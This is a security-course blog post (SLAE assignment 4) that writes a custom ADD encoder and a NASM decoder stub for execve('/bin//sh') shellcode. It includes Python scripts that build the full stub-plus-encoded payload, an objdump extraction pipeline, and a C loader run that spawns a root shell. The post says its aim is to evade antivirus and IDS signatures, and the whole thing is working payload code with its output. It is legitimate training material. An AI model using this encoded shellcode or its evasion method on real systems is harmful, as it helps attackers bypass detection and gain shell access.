Assignment_4 – Custom Encoder

This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-581

Encoding shellcode matters in real life: the vast majority of antivirus products and IDS are configured to catch commonly used signatures, and encoding makes detecting the shellcode more difficult.

The script below encodes shellcode by adding 0x1 to every byte.

#!/usr/bin/python

# Python ADD encoder (Python 2)

# execve("/bin//sh") original shellcode, 25 bytes
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")

encoded = ""    # "\x.." form, for the C checker
encoded2 = ""   # "0x..," form, for the NASM db line

print 'Encoded shellcode ...'

for x in bytearray(shellcode):
        # ADD encoding: add 1 to every byte, wrapping at 0xff so that 0xff
        # becomes 0x00 instead of the three-digit 0x100 (a 0x00 would then
        # terminate the C string, so choose another key in that case)
        y = (x + 0x1) & 0xff
        encoded += '\\x'
        encoded += '%02x' % y

        encoded2 += '0x'
        encoded2 += '%02x,' % y

print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

Let's run the encoder script:

python encoder.py
Encoded shellcode ...
\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x32\xd3\xb1\x0c\xce\x81
0x32,0xc1,0x51,0x69,0x30,0x30,0x74,0x69,0x69,0x30,0x63,0x6a,0x6f,0x8a,0xe4,0x51,0x54,0x8a,0xe2,0x32,0xd3,0xb1,0x0c,0xce,0x81,
Len: 25

Its output is the encoded shellcode, which we will use in our decoder.
The script below converts the data back to the original code, after which the original code is executed:

global _start

section .text
_start:

        ; JMP-CALL-POP: get the address of the encoded bytes into ESI
        jmp short call_shellcode

decoder:
        pop esi                 ; ESI -> first encoded byte
        xor ecx, ecx
        mov cl, 25              ; number of bytes to decode

        decode:
        sub byte [esi], 0x1     ; reverse the ADD encoding
        inc esi
        loop decode

        jmp short shellcode_to_decode   ; run the decoded shellcode

call_shellcode:
        call decoder
        shellcode_to_decode: db 0x32,0xc1,0x51,0x69,0x30,0x30,0x74,0x69,0x69,0x30,0x63,0x6a,0x6f,0x8a,0xe4,0x51,0x54,0x8a,0xe2,0x32,0xd3,0xb1,0x0c,0xce,0x81

As you can see, the decoding scheme is pretty simple: we use the sub instruction to bring every byte of our shellcode back to its original value.
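
As an added example (my own Python 3 script, not the encoder from this post), here is a version of the ADD encoder that also emulates the decoder loop to verify the round trip, checks that the encoded bytes contain no NUL, and prepends the decoder stub from this post so that the complete payload for the C checker comes out of one script. The stub bytes are the ones the objdump extraction below produces; the byte offsets 6 and 9 of the `mov cl, N` and `sub byte [esi], key` immediates are assumptions read from that listing, and the key parameter is an extension of the post's fixed 0x1.

```python
#!/usr/bin/env python3
"""Added example (not the original post's script): ADD encoder with
round-trip verification and decoder-stub assembly."""

# execve("/bin//sh") shellcode from the post, 25 bytes
ORIGINAL = bytes.fromhex(
    "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80"
)

# Decoder stub as the post extracts it with objdump:
#   jmp short / pop esi / xor ecx,ecx / mov cl,25 / sub byte [esi],1 /
#   inc esi / loop / jmp short / call decoder
# Two bytes depend on the payload: the length (offset 6) and the key (offset 9).
STUB = bytearray.fromhex("eb0d5e31c9b119802e0146e2faeb05e8eeffffff")
LEN_OFFSET = 6   # immediate of `mov cl, N`   (assumed from the listing)
KEY_OFFSET = 9   # immediate of `sub byte [esi], key` (assumed from the listing)


def encode(data: bytes, key: int = 0x1) -> bytes:
    """ADD-encode every byte; wrap mod 256 so 0xff does not become 0x100."""
    return bytes((b + key) & 0xff for b in data)


def decode(data: bytes, key: int = 0x1) -> bytes:
    """Mirror of the NASM loop: `sub byte [esi], key` over every byte."""
    return bytes((b - key) & 0xff for b in data)


def as_c_string(data: bytes) -> str:
    """Format for the unsigned char shellcode[] in checker.c."""
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'


def as_nasm_db(data: bytes) -> str:
    """Format for the db line of the decoder."""
    return "db " + ",".join(f"0x{b:02x}" for b in data)


def build_payload(shellcode: bytes, key: int = 0x1) -> bytes:
    """Return decoder stub + encoded shellcode, ready for the C checker."""
    if not 1 <= key <= 0xff:
        raise ValueError("key must fit in the one-byte sub immediate")
    if not 1 <= len(shellcode) <= 0xff:
        raise ValueError("mov cl, N only holds lengths from 1 to 255")
    encoded = encode(shellcode, key)
    if b"\x00" in encoded:
        # e.g. a 0xff input byte with key 1 wraps to 0x00 and would
        # truncate the C string; the caller has to pick another key
        raise ValueError("encoded shellcode contains a NUL byte; pick another key")
    if decode(encoded, key) != shellcode:
        raise AssertionError("round trip failed")
    stub = bytearray(STUB)
    stub[LEN_OFFSET] = len(shellcode)
    stub[KEY_OFFSET] = key
    return bytes(stub) + encoded


if __name__ == "__main__":
    enc = encode(ORIGINAL)
    print("Encoded shellcode ...")
    print(as_c_string(enc))
    print(as_nasm_db(enc))
    print("Len:", len(ORIGINAL))
    print("Stub + encoded, for checker.c:")
    print(as_c_string(build_payload(ORIGINAL)))
```

Run it without arguments and the first two lines of output match the encoder output above, while the last line matches the string extracted from the ELF further down. Because the stub uses short jumps that only span the decoder itself, the jump offsets do not change with the payload length; only the `mov cl` immediate does, which is why the length must stay at 255 bytes or less.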

Let's compile and link our code:

root@debian:/usr/local/src/SLAE/4_assigment# nasm -f elf32 my_decoder.nasm -o my_decoder.o
root@debian:/usr/local/src/SLAE/4_assigment# ld my_decoder.o -o my_decoder

And now we have to extract our shellcode from the ELF:

objdump -d ./my_decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x2e\x01\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x32\xd3\xb1\x0c\xce\x81"
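
The grep/cut/sed chain above depends on how objdump lays out each line (number of bytes per line, tabs versus spaces). As an added example that is not part of the original post, the Python 3 script below does the same extraction with a regular expression that only relies on the `address:<tab>hex bytes<tab>mnemonic` shape of an instruction line. The objdump text embedded in it is constructed to match `objdump -d` output for the decoder stub, with assumed addresses, so the script runs offline; on a real binary you would feed it the output of `objdump -d ./my_decoder` instead.

```python
#!/usr/bin/env python3
"""Added example (not from the post): extract raw opcode bytes from
`objdump -d` text with a regular expression."""
import re

# Constructed sample in `objdump -d` (AT&T syntax) format covering the
# decoder stub of this post; the addresses are assumed.
SAMPLE_OBJDUMP = """
./my_decoder:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:\teb 0d                \tjmp    804806f <call_shellcode>

08048062 <decoder>:
 8048062:\t5e                   \tpop    %esi
 8048063:\t31 c9                \txor    %ecx,%ecx
 8048065:\tb1 19                \tmov    $0x19,%cl

08048067 <decode>:
 8048067:\t80 2e 01             \tsubb   $0x1,(%esi)
 804806a:\t46                   \tinc    %esi
 804806b:\te2 fa                \tloop   8048067 <decode>
 804806d:\teb 05                \tjmp    8048074 <shellcode_to_decode>

0804806f <call_shellcode>:
 804806f:\te8 ee ff ff ff       \tcall   8048062 <decoder>
"""

# An instruction line: optional indent, hex address, colon, whitespace,
# then one or more "hh " byte groups. Symbol headers ("08048060 <_start>:")
# and the "file format" line do not match because nothing hex follows the colon.
INSN_LINE = re.compile(r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2}\s)+)")


def extract_opcodes(disasm: str) -> bytes:
    """Return the concatenated opcode bytes of every instruction line."""
    out = bytearray()
    for line in disasm.splitlines():
        m = INSN_LINE.match(line)
        if m:
            # the byte column may end in spaces or a tab; split() drops them
            out += bytes.fromhex("".join(m.group(1).split()))
    return bytes(out)


def to_c_string(data: bytes) -> str:
    """Same "\\x.." string the sed pipeline produces."""
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'


def has_nul(data: bytes) -> bool:
    """A NUL inside the shellcode would cut strlen() short in checker.c."""
    return b"\x00" in data


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OBJDUMP
    code = extract_opcodes(text)
    print(to_c_string(code))
    print("Len:", len(code), "NUL present:", has_nul(code))
```

With the embedded sample the script prints the 20 stub bytes, i.e. the first 20 bytes of the string above; piped the real `objdump -d` output it prints the full 45. The `has_nul` check is worth running on every extracted blob, since the C checker measures the payload with `strlen()`.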

Load it into checker.c:


#include <stdio.h>
#include <string.h>

/* decoder stub followed by the ADD-encoded execve shellcode (45 bytes) */
unsigned char shellcode[] = "\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x2e\x01\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x32\xd3\xb1\x0c\xce\x81";

int main(void)
{
        /* strlen stops at the first NUL, so the encoded bytes must not contain one */
        printf("Shellcode Length: %d\n", (int)strlen((char *)shellcode));
        /* the stub decodes the bytes in place, so the array must be writable
           as well as executable (hence -z execstack when compiling) */
        int (*ret)(void) = (int (*)(void))shellcode;
        ret();
        return 0;
}

Compile our checker:
gcc -fno-stack-protector -z execstack checker.c -o checker

and run:
root@debian:/usr/local/src/SLAE/4_assigment# ./checker
Shellcode Length: 45
#

Works fine: the decoder stub restored the original bytes and the execve shellcode spawned the root shell.
